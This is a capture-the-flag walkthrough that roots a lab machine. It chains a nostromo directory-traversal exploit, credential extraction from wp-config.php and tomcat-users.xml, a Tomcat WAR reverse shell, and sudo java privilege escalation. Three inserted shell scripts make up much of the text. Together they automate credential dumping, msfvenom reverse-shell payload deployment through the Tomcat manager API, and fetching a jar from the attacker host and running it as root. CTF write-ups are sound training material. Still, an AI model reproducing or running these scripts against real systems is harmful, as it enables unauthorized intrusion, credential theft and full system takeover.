You can download the machine from
Goal: Get the root flag of the target.
Difficulty: Medium/Intermediate Level
Lab Setup:-
Download the machine from the link and import it into VirtualBox.
Network Mode: Bridged Adapter
In my lab the target machine's IP is 192.168.1.211.
Let’s start with reconnaissance.
┌──(root💀kali)-[/home/danial/Desktop/InfosecWarrior/My_Web_server]
└─# nmap -sV -sC -A -vv -oA nmap -p- 192.168.1.211
Several ports are open:
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.4.38 ((Debian))
2222/tcp open http syn-ack nostromo 1.9.6
3306/tcp open mysql syn-ack MySQL (unauthorized)
8009/tcp open ajp13 syn-ack Apache Jserv (Protocol v1.3)
8080/tcp open http syn-ack Apache Tomcat/Coyote JSP engine 1.1
8081/tcp open http syn-ack nginx 1.14.2
Port 80 hosts a WordPress site. Opening any page redirects to a hostname rather than the IP (the site is bound to a domain name), so add an entry for that hostname, pointing at 192.168.1.211, to the /etc/hosts file.
Enumerating port 80 turned up nothing interesting,
so I moved on to port 2222.
Port 2222 runs nostromo 1.9.6, for which a public exploit exists (CVE-2019-16278: a directory traversal in the URL handling lets an unauthenticated POST request execute /bin/sh on the server).
The exploit works, so it's time to get a shell.
A bash reverse shell did not work for me, so I downloaded an nc package onto the server manually and used it for the reverse shell.
Okay! So we have a shell as the daemon user.
The passwd file contains an entry for a tomcat user, so let's first try to get tomcat's privileges.
While enumerating the web root I found database credentials in the wp-config.php file.
In the database I got the WordPress password hash. We are after the tomcat credentials, but these are worth keeping.
After running
daemon@webserver:/var/www/html/site1$ find / -user tomcat 2>/dev/null
I found the tomcat directory, and in it the tomcat credentials.
Now let's log in to the Tomcat manager on port 8080 with the tomcat credentials and get tomcat's privileges.
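The two credential files this step depends on, handled as an added example (not the author's commands): pulling the `define()` values out of wp-config.php, querying the WordPress user table with them, and reading the manager account out of Tomcat's conf/tomcat-users.xml, which is where the credentials normally live. The file contents inside the script are constructed samples in the standard formats, not captured from the box; the wp-config.php path, the `wp_` table prefix and a local mysql client are assumptions (port 3306 reported "unauthorized" to nmap, so query it from the box itself).

```shell
#!/bin/sh
# Added example, not from the walkthrough: credential extraction on the box.

# Value of a define('NAME', 'value') line from a wp-config.php read on stdin.
wp_define() {
    sed -n "s/^[[:space:]]*define([[:space:]]*['\"]$1['\"][[:space:]]*,[[:space:]]*['\"]\([^'\"]*\)['\"].*/\1/p" | head -n 1
}

# Constructed sample wp-config.php (not the real file).
sample_wp_config() {
cat <<'EOF'
<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wpuser' );
define( 'DB_PASSWORD', 'ChangeMe123!' );
define( 'DB_HOST', 'localhost' );
EOF
}

# Dump WordPress logins and phpass hashes using the creds in $1 (wp_ prefix assumed).
wp_dump_hashes() {
    cfg=$1
    mysql -h "$(wp_define DB_HOST < "$cfg")" -u "$(wp_define DB_USER < "$cfg")" \
          -p"$(wp_define DB_PASSWORD < "$cfg")" "$(wp_define DB_NAME < "$cfg")" \
          -e 'SELECT user_login, user_pass FROM wp_users;'
}

# user:password pairs from tomcat-users.xml on stdin. The stock file ships
# example <user> lines inside XML comments, so comments are dropped first:
# single-line ones by substitution, multi-line ones by range deletion.
tomcat_users() {
    sed -e 's/<!--.*-->//' -e '/<!--/,/-->/d' \
      | grep -o '<user [^>]*>' \
      | sed -n 's/.*username="\([^"]*\)".*password="\([^"]*\)".*/\1:\2/p'
}

# Constructed sample tomcat-users.xml (not the real file).
sample_tomcat_users() {
cat <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml">
<!--
  <user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
-->
  <!-- <user username="demo" password="demo" roles="manager-gui"/> -->
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
</tomcat-users>
EOF
}

# On the box: locate tomcat-owned files, then read the users file.
find_tomcat_creds() {
    find / -user tomcat -name tomcat-users.xml 2>/dev/null | while read -r f; do
        echo "== $f"; tomcat_users < "$f"
    done
}

case "${1:-}" in
    wp)     wp_dump_hashes "${2:-/var/www/html/site1/wp-config.php}" ;;  # path assumed
    tomcat) find_tomcat_creds ;;
esac
```

The roles attribute matters for the next step: `manager-gui` only lets you use the HTML form, while deploying with curl against `/manager/text/` needs `manager-script`.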
Okay!!
Now that we are logged in, it's time to upload a shell.
I'm uploading a WAR shell to gain access.
After uploading the shell, start a listener and trigger it to get a shell as the tomcat user.
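The WAR deployment done from the command line, as an added example rather than the author's clicks in the manager GUI: msfvenom builds the JSP reverse shell, curl PUTs it to the manager's text API, and requesting the context root runs the JSP. TARGET, LHOST/LPORT, the context name and the tomcat password are assumptions; the account must hold the `manager-script` role for `/manager/text/` (with only `manager-gui` this returns 403 and the HTML form is the fallback).

```shell
#!/bin/sh
# Added example, not the walkthrough's own commands: reverse-shell WAR via the
# Tomcat manager text API. All values below are assumed.
TARGET=${TARGET:-http://192.168.1.211:8080}
LHOST=${LHOST:-192.168.1.100}
LPORT=${LPORT:-4444}
TOMCAT_USER=${TOMCAT_USER:-tomcat}
TOMCAT_PASS=${TOMCAT_PASS:-s3cret}    # use the value from tomcat-users.xml
CONTEXT=${CONTEXT:-/rev}

# Deploy/undeploy endpoints of the text API (needs manager-script, not manager-gui).
tomcat_deploy_url()   { printf '%s/manager/text/deploy?path=%s&update=true' "$1" "$2"; }
tomcat_undeploy_url() { printf '%s/manager/text/undeploy?path=%s' "$1" "$2"; }

# JSP reverse shell packed as a WAR; the JSP is the WAR's welcome file.
make_war() {
    msfvenom -p java/jsp_shell_reverse_tcp LHOST="$LHOST" LPORT="$LPORT" -f war -o "$1"
}

# -T sends the file with PUT, which is what the deploy endpoint expects.
deploy_war() {
    curl -fsS -u "$TOMCAT_USER:$TOMCAT_PASS" -T "$1" "$(tomcat_deploy_url "$TARGET" "$CONTEXT")"
}

# Hitting the context root executes the JSP, which connects back to the listener.
trigger() { curl -s -o /dev/null "$TARGET$CONTEXT/"; }

cleanup() { curl -fsS -u "$TOMCAT_USER:$TOMCAT_PASS" "$(tomcat_undeploy_url "$TARGET" "$CONTEXT")"; }

case "${1:-}" in
    deploy)  make_war /tmp/rev.war && deploy_war /tmp/rev.war ;;
    trigger) trigger ;;        # run "nc -lvnp $LPORT" in another terminal first
    clean)   cleanup ;;
esac
```

Order of operations: `./tomcat.sh deploy`, then `nc -lvnp 4444` in a second terminal, then `./tomcat.sh trigger`; `clean` removes the context once you have the shell.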
Checking sudo -l as tomcat shows we can execute /usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java as the super user.
So for root we use msfvenom again to generate a Java (jar) payload.
Transfer the file to the target by any method; I'm starting a Python HTTP server on my machine and downloading the file on the target with wget.
Start a listener first,
then run the payload with sudo via /usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java (java -jar).
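The root step end to end, as an added example (not the author's commands): the sudo rule fixes the java binary but not the jar it runs, so any jar we control executes as root. The script parses the java path out of `sudo -l` output so it is not hard-coded; the sample output embedded below is constructed (the NOPASSWD detail in it is an assumption), as are LHOST/LPORT and the `python3 -m http.server 8000` serving the jar from the attacker box.

```shell
#!/bin/sh
# Added example, not the walkthrough's own commands: root via sudo-permitted java.
LHOST=${LHOST:-192.168.1.100}   # assumed attacker IP
LPORT=${LPORT:-5555}            # separate port, 4444 is still holding the tomcat shell

# The java binary the user may run via sudo, read from "sudo -l" output on stdin.
# Only the "may run the following commands" section is considered; empty if none.
sudo_java_path() {
    sed -n '/may run the following commands/,$p' | grep -o '/[^[:space:],]*/bin/java' | head -n 1
}

# Constructed sample of "sudo -l" for tomcat (not captured from the box).
sample_sudo_l() {
cat <<'EOF'
Matching Defaults entries for tomcat on webserver:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User tomcat may run the following commands on webserver:
    (root) NOPASSWD: /usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java
EOF
}

# Attacker side: jar reverse shell (serve it with: python3 -m http.server 8000).
make_jar() { msfvenom -p java/shell_reverse_tcp LHOST="$LHOST" LPORT="$LPORT" -f jar -o "$1"; }

# Target side: confirm the rule, fetch the jar, run it through the allowed java.
root_shell() {
    java=$(sudo -l | sudo_java_path)
    [ -n "$java" ] || { echo "no sudo rule for java" >&2; return 1; }
    wget -q "http://$LHOST:8000/root.jar" -O /tmp/root.jar
    sudo "$java" -jar /tmp/root.jar
}

case "${1:-}" in
    jar)  make_jar root.jar ;;   # on the attacker box
    root) root_shell ;;          # on the target, after "nc -lvnp $LPORT" is listening
esac
```

The `-jar` form is what makes this work: java is the trusted path in the sudoers rule, but the jar is an argument sudo never inspects.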
Boom !!
We got root | Happy Hacking.